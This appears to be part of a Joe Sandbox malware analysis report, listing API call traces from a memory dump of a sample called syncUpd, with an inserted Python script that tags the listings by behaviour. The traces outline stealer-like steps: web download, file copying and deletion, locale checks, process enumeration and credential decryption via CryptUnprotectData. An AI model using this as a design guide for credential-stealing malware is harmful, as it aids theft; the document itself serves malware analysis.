• Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
• Opcode Fuzzy Hash: c7c3ee99c4ae816946169d1e265cb946bac083ea11a6c42839c32c6eeee0e167
• Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
• StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
• StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
• FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
• FindClose.KERNEL32(000000FF), ref: 0040D500
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                  • String ID: 8Jr
                                                                                                                                                                                                                                  • API String ID: 3334442632-1638193829
                                                                                                                                                                                                                                  • Opcode ID: de9534d38254fefd06480637589c9ca20507d8755ec8c9e1e7e424c8080e94d4
                                                                                                                                                                                                                                  • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de9534d38254fefd06480637589c9ca20507d8755ec8c9e1e7e424c8080e94d4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
• RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
• InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
• InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
• InternetCloseHandle.WININET(c.A), ref: 00404D75
• InternetCloseHandle.WININET(?), ref: 00404D82
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
• String ID: c.A$c.A
• API String ID: 3066467675-270182787
• Opcode ID: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
• Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
• Opcode Fuzzy Hash: ff34e455916cb5254e18773c9340263e729f543755462a643926861e0345f7f7
• Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
• StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
• StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
• DeleteFileA.KERNEL32(00000000), ref: 00401CB4
• FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
• FindClose.KERNEL32(000000FF), ref: 00401D1C
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
• String ID: \*.*
• API String ID: 1415058207-1173974218
• Opcode ID: b4d217c2a32c323df012dff938534dacdb494f817d2ec8d97e3e5cb294c5cda7
• Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
• Opcode Fuzzy Hash: b4d217c2a32c323df012dff938534dacdb494f817d2ec8d97e3e5cb294c5cda7
• Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
• GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
• LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
• GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
• LocalFree.KERNEL32(00000000), ref: 004146DF
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
• String ID: /
• API String ID: 3090951853-4001269591
• Opcode ID: 294f136ef59468542dff649e32f3b16774d834884e78db4a947e8595ab33b79e
• Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
• Opcode Fuzzy Hash: 294f136ef59468542dff649e32f3b16774d834884e78db4a947e8595ab33b79e
• Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
Uniqueness

Uniqueness Score: -1.00%
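The four function listings above are the raw material for the "evasive API chain (locale check)", "searches for specific processes" and file-walk signatures in the overview, but the report presents them one bullet at a time. The following parser is an added example for working with this listing format; it is not Joe Sandbox code, and the behaviour labels it assigns are this script's own heuristics, not the sandbox's signature names. It splits the dump on the "APIs" headers, separates a function's direct calls from calls attributed to a "Part of subcall function" helper, keeps the String ID, API String ID and hash bullets, and tags each function with the API chain it exhibits: the WinINet download, the FindFirstFileA/CopyFileA/DeleteFileA walk over "\*.*", the GetKeyboardLayoutList/GetLocaleInfoA check, and the Toolhelp32 process enumeration. The embedded sample is a constructed, trimmed copy of the listings above.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# One API bullet: optional "Part of subcall function XXXXXXXX:" prefix, then API.MODULE(args), ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Identity bullets kept per function (String ID, API String ID, hashes)
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$"
)
# Heuristic labels (this script's own, not Joe Sandbox signature names). A label applies
# only when every listed API is called directly by the function, not merely via a subcall helper.
BEHAVIOUR_RULES = [
    ("WinINet download", {"InternetOpenA", "InternetOpenUrlA", "InternetReadFile"}),
    ("Toolhelp32 process enumeration", {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}),
    ("keyboard layout / locale check", {"GetKeyboardLayoutList", "GetLocaleInfoA"}),
    ("directory walk", {"FindFirstFileA", "FindNextFileA", "FindClose"}),
    ("copy-and-delete during directory walk", {"FindFirstFileA", "CopyFileA", "DeleteFileA"}),
]

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str                       # call-site address in the dump
    subcall: Optional[str] = None  # helper address when the call is reached only via a subcall

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def direct_apis(self) -> set:
        return {c.api for c in self.calls if c.subcall is None}

    def first_ref(self) -> Optional[str]:
        """Lowest direct call-site address: a usable stand-in for the function's location."""
        refs = [c.ref for c in self.calls if c.subcall is None]
        return min(refs) if refs else None

    def behaviours(self) -> list:
        apis = self.direct_apis()
        return [label for label, needed in BEHAVIOUR_RULES if needed <= apis]

def parse_report(text: str) -> list:
    """Split the listing on 'APIs' headers; bullets before the first header are dropped."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
        elif current is not None:
            m = API_RE.match(line)
            if m:
                current.calls.append(ApiCall(m["api"], m["mod"], m["args"].split(","), m["ref"], m["sub"]))
            elif (m := FIELD_RE.match(line)):
                current.fields[m["key"]] = m["val"]
    return entries

def summarize(text: str) -> list:
    """(first direct ref, String ID, behaviour labels) per function, for a triage table."""
    return [(e.first_ref(), e.fields.get("String ID"), e.behaviours()) for e in parse_report(text)]

# Constructed sample: a trimmed copy of four function listings from the report above.
SAMPLE_REPORT = r"""
APIs
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
• InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
• InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
• String ID: c.A$c.A
• API String ID: 3066467675-270182787
APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
• DeleteFileA.KERNEL32(00000000), ref: 00401CB4
• FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
• FindClose.KERNEL32(000000FF), ref: 00401D1C
• String ID: \*.*
APIs
• GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
• Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
• Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
"""

if __name__ == "__main__":
    for ref, string_id, labels in summarize(SAMPLE_REPORT):
        print(ref, string_id, ", ".join(labels))
```

Run it against a saved copy of the full function section and the output is one row per function keyed by its lowest direct call address, which is enough to cross-reference the overview's signature list with the code that triggered it. The rules deliberately ignore calls marked "Part of subcall function": the lstrcpy/lstrcat helpers at 00416D40, 00416EA0 and 00416FB0 appear under almost every function and would otherwise make every entry look alike.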

APIs
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
• Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
• Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
• FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3491751439-0
                                                                                                                                                                                                                                  • Opcode ID: 46479fa1dff31d1553307a673ed5531c210884f90894ffa9fa2d91d76bee7172
                                                                                                                                                                                                                                  • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46479fa1dff31d1553307a673ed5531c210884f90894ffa9fa2d91d76bee7172
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00724D08,00000000,?,0041D758,00000000,?,00000000,00000000,?,00725238,00000000), ref: 004144C0
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 362916592-0
                                                                                                                                                                                                                                  • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                  • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                  • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                  • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BEA0), ref: 0041625D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BE80), ref: 00416275
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D538), ref: 0041628E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D568), ref: 004162A6
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D580), ref: 004162BE
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D598), ref: 004162D7
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007200F8), ref: 004162EF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D5B0), ref: 00416307
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D5C8), ref: 00416320
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D6B8), ref: 00416338
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D640), ref: 00416350
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BE20), ref: 00416369
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BE00), ref: 00416381
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF00), ref: 00416399
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF20), ref: 004163B2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071D5E0), ref: 004163CA
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007245D0), ref: 004163E2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00720378), ref: 004163FB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BC80), ref: 00416413
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007245E8), ref: 0041642B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007246D8), ref: 00416444
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724738), ref: 0041645C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007245A0), ref: 00416474
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF40), ref: 0041648D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724600), ref: 004164A5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724510), ref: 004164BD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724690), ref: 004164D6
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007246A8), ref: 004164EE
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724468), ref: 00416506
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724528), ref: 0041651F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007246C0), ref: 00416537
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007246F0), ref: 0041654F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724498), ref: 00416568
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071FE38), ref: 00416580
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007245B8), ref: 00416598
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724540), ref: 004165B1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF60), ref: 004165C9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,007244F8), ref: 004165E1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BF80), ref: 004165FA
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724588), ref: 00416612
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00724558), ref: 0041662A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071BFA0), ref: 00416643
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0071C3E0), ref: 0041665B
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724570,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724750,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724678,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724480,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724618,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724708,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724630,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00724648,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0071C320), ref: 0041670A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,00724660), ref: 00416722
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0071D968), ref: 0041673A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,00724720), ref: 00416753
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0071C040), ref: 0041676B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,007202B0), ref: 00416790
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,0071C140), ref: 004167A9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,00720148), ref: 004167C1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,007244B0), ref: 004167D9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,007244C8), ref: 004167F2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,0071C340), ref: 0041680A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,0071C300), ref: 00416822
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73440000,007244E0), ref: 0041683B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,0071C120), ref: 0041685C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,0071C2C0), ref: 00416874
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,00724780), ref: 0041688D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,00724798), ref: 004168A5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,0071C0E0), ref: 004168BD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,0071FF18), ref: 004168E3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,00720170), ref: 004168FB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,00724768), ref: 00416913
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,0071C160), ref: 0041692C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,0071C360), ref: 00416944
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,0071FFB8), ref: 0041695C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,007247B0), ref: 00416982
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0071C060), ref: 0041699A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0071D908), ref: 004169B2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,00724828), ref: 004169CB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,007247C8), ref: 004169E3
